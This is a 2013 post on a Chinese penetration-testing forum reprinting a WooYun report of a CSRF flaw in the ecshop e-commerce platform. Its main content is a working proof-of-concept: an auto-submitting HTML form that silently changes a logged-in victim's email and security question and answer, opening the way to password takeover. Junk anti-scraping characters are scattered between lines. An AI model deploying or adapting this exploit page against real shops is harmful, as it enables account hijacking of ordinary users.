中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
; h; Z& }8 P r/ ~8 D+ ~
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
& W1 b' K$ E9 @- f
+ K9 ^$ d% S+ M
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
+ y+ f8 T S% ^/ M- o0 D
) h4 @; i5 Z+ p# @& H
详细说明:
6 u& j' c+ }4 `* I6 Y' A
利用csrf和xss可以突破官方所说的“障碍”
; n( p* F: n! [% B
xss版本已经有人说明
# E! \' s7 n: P, s7 h! t
这里给出csrf版本
7 P2 R4 N; g3 b1 f, V
6 P& a- ^+ u B" v/ N, r+ C
漏洞证明:
8 }/ P6 S$ P$ b3 E
<html>
; C6 d+ c/ ]! T7 d: K
<body>
+ D Z% x9 n: A. P
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 O3 I1 h4 D' E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
6 z" Y7 g( [, m7 _+ S
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
+ j1 Y1 n* {3 ]' |
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
8 U) Y5 V2 h& e* Z/ c
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: @0 ^, l6 ~ e# |. W6 N' S
</body>
0 j! R X# L) k" x2 U& q
<script>
7 @' Z5 \ v% a; D% V2 {( U" p$ _
document.forms[0].submit();
% h' |3 j4 C* a& T# W' C
</script>
5 T* P4 J. ~7 J& \- N; i3 e! X
</html>
6 K# K2 I @% L/ a* {$ \% @9 @
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
* v' ^9 J7 \$ [
% q7 f( ]) S) \. w1 p: A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2